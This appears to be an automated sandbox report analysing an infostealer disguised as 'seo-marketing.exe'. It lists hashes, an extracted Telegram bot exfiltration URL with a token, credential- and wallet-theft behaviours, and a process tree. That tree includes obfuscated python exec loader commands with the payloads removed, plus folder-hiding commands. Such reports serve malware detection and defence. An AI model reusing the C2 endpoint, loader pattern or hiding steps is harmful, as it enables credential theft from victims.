Analysis
max time kernel: 116s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-08-2024 05:35
Static task: static1
Behavioral task: behavioral1
Sample: seo-marketing.exe
Resource: win7-20240704-en
Behavioral task: behavioral2
Sample: seo-marketing.exe
Resource: win10v2004-20240802-en
General
Target: seo-marketing.exe
Size: 60.2MB
MD5: 2bf7d4849bcf39691c8c49ed1ac92f76
SHA1: f2c477fa8d31b6b4f69ec910d81edc230a696d8e
SHA256: 133e7b9b8be02554a282cc51be5a419d7c867bf0ad30939077121029843d4cd2
SHA512: b757b804c82e061c37aaa6e059f0a6a72da57beeddbf16ea898be4db60afddedb75051a512a11fa69a16120cd9b6c04e1646b7181f501ce3b785b4f995a864e0
SSDEEP: 1572864:OgvxU1VpeCDiyPKKdBHYSA+H438beTcGleoL:Ogy1VrDmKdY38beTcloL
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7373326479:AAFc-qF_6b4d0zpxZKNAYyps6FvSKGESa2U/sendMessage?chat_id=-4262874204
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3688-7508-0x000001CE82190000-0x000001CE821A2000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation seo-marketing.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk python.exe -
Executes dropped EXE 9 IoCs
pid Process 2400 explorer.exe 1008 python.exe 728 python.exe 5088 python.exe 3352 python.exe 3376 python.exe 4736 python.exe 2196 python.exe 3688 python.exe -
Loads dropped DLL 64 IoCs
pid Process
2224 seo-marketing.exe
2400 explorer.exe
1008 python.exe
728 python.exe
5088 python.exe
3352 python.exe
3376 python.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 43 raw.githubusercontent.com 59 raw.githubusercontent.com 14 raw.githubusercontent.com 24 raw.githubusercontent.com 25 raw.githubusercontent.com 54 raw.githubusercontent.com 58 raw.githubusercontent.com 61 raw.githubusercontent.com 15 raw.githubusercontent.com 27 raw.githubusercontent.com 35 raw.githubusercontent.com 42 raw.githubusercontent.com 60 raw.githubusercontent.com -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 api.ipify.org 18 api.ipify.org 19 api.ipify.org 20 api.ipify.org 21 api.ipify.org 22 api.ipify.org 44 ip-api.com -
pid Process 5088 python.exe 3352 python.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4188 TASKLIST.exe 4156 TASKLIST.exe 448 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 2352 cmd.exe 628 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings seo-marketing.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2148 vlc.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process
2196 python.exe
3688 python.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2148 vlc.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process
Token: SeDebugPrivilege 4188 TASKLIST.exe
Token: 33 1332 AUDIODG.EXE
Token: SeIncBasePriorityPrivilege 1332 AUDIODG.EXE
Token: 33 2148 vlc.exe
Token: SeIncBasePriorityPrivilege 2148 vlc.exe
Token: SeDebugPrivilege 4156 TASKLIST.exe
Token: SeDebugPrivilege 448 tasklist.exe
Token: SeIncreaseQuotaPrivilege 3540 wmic.exe
Token: SeSecurityPrivilege 3540 wmic.exe
Token: SeTakeOwnershipPrivilege 3540 wmic.exe
Token: SeLoadDriverPrivilege 3540 wmic.exe
Token: SeSystemProfilePrivilege 3540 wmic.exe
Token: SeSystemtimePrivilege 3540 wmic.exe
Token: SeProfSingleProcessPrivilege 3540 wmic.exe
Token: SeIncBasePriorityPrivilege 3540 wmic.exe
Token: SeCreatePagefilePrivilege 3540 wmic.exe
Token: SeBackupPrivilege 3540 wmic.exe
Token: SeRestorePrivilege 3540 wmic.exe
Token: SeShutdownPrivilege 3540 wmic.exe
Token: SeDebugPrivilege 3540 wmic.exe
Token: SeSystemEnvironmentPrivilege 3540 wmic.exe
Token: SeRemoteShutdownPrivilege 3540 wmic.exe
Token: SeUndockPrivilege 3540 wmic.exe
Token: SeManageVolumePrivilege 3540 wmic.exe
Token: 33 3540 wmic.exe
Token: 34 3540 wmic.exe
Token: 35 3540 wmic.exe
Token: 36 3540 wmic.exe
Token: SeDebugPrivilege 2196 python.exe
Token: SeDebugPrivilege 3688 python.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process
2148 vlc.exe
-
Suspicious use of SendNotifyMessage 22 IoCs
pid Process
2148 vlc.exe
-
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process
2148 vlc.exe
3688 python.exe
-
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target
PID 2224 wrote to memory of 2148 2224 seo-marketing.exe 87
PID 2224 wrote to memory of 4188 2224 seo-marketing.exe 88
PID 2224 wrote to memory of 2400 2224 seo-marketing.exe 91
PID 2400 wrote to memory of 4156 2400 explorer.exe 93
PID 2400 wrote to memory of 1008 2400 explorer.exe 94
PID 1008 wrote to memory of 2856 1008 python.exe 95
PID 2856 wrote to memory of 3008 2856 cmd.exe 96
PID 1008 wrote to memory of 4132 1008 python.exe 97
PID 4132 wrote to memory of 4816 4132 cmd.exe 98
PID 1008 wrote to memory of 1572 1008 python.exe 99
PID 1572 wrote to memory of 448 1572 cmd.exe 100
PID 1572 wrote to memory of 2120 1572 cmd.exe 101
PID 1572 wrote to memory of 2640 1572 cmd.exe 102
PID 1008 wrote to memory of 3540 1008 python.exe 103
PID 2400 wrote to memory of 728 2400 explorer.exe 104
PID 2400 wrote to memory of 5088 2400 explorer.exe 105
PID 5088 wrote to memory of 2352 5088 python.exe 106
PID 2352 wrote to memory of 3620 2352 cmd.exe 107
PID 2400 wrote to memory of 3352 2400 explorer.exe 108
PID 3352 wrote to memory of 628 3352 python.exe 109
PID 628 wrote to memory of 1152 628 cmd.exe 110
PID 2400 wrote to memory of 3376 2400 explorer.exe 111
PID 2400 wrote to memory of 4736 2400 explorer.exe 112
PID 2400 wrote to memory of 2196 2400 explorer.exe 113
PID 2400 wrote to memory of 1128 2400 explorer.exe 115
PID 1128 wrote to memory of 5116 1128 cmd.exe 116
PID 2400 wrote to memory of 3688 2400 explorer.exe 118
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3620 attrib.exe 1152 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\seo-marketing.exe"C:\Users\Admin\AppData\Local\Temp\seo-marketing.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\marketing.mp4"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2148
-
-
C:\Windows\system32\TASKLIST.exe"TASKLIST" /FI "STATUS eq RUNNING"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\explorerwi\explorer.exe"C:\explorerwi\explorer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\TASKLIST.exe"TASKLIST" /FI "STATUS eq RUNNING"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('[payload removed]')));JVBT(__import__('marshal').loads(__import__('base64').b64decode('[payload removed]')))3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"4⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc5⤵PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"4⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName5⤵PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""4⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\tasklist.exeTASKLIST /FI "STATUS eq RUNNING"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\find.exefind /V "Image Name"5⤵PID:2120
-
-
C:\Windows\system32\find.exefind /V "="5⤵PID:2640
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'iEMPbz9GB6XvT5YNUT5jndifgFC_uueQgS8I2McPvTg=').decrypt(b'[encrypted payload removed]'))"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:728
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'uxyI_CawdzHc_-f0v31N6RdOhmPceWptkt9gJaHBwxU=').decrypt(b'[encrypted payload removed]'))"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwin""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\attrib.exeattrib +h +s "C:/explorerwin"5⤵
- Views/modifies file attributes
PID:3620
-
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'ViriKlkg22n1ztfawqmpxUymLAlW_I5_g41x7FLJOnE=').decrypt(b'[encrypted payload removed]'))"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwi""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\attrib.exeattrib +h +s "C:/explorerwi"5⤵
- Views/modifies file attributes
PID:1152
-
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'PFEb2Ao_jLL5_G5rAQ1I7A2BHguUlElphEwsGEaRwj4=').decrypt(b'[encoded payload omitted]'))"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:3376
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'j0knKB1fYayqDZdr3iGITcnODiWrTBl_F7AEhafzEaQ=').decrypt(b'[encoded payload omitted]'))"3⤵
- Executes dropped EXE
PID:4736
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('[encoded payload omitted]')));GECG(__import__('marshal').loads(__import__('base64').b64decode('[encoded payload omitted]')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\cmd.exe"cmd" /C hostname3⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:5116
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('[encoded payload omitted]')));RVIS(__import__('marshal').loads(__import__('base64').b64decode('[encoded payload omitted]')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3688
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x494 0x1501⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332
Network
MITRE ATT&CK Enterprise v15
Downloads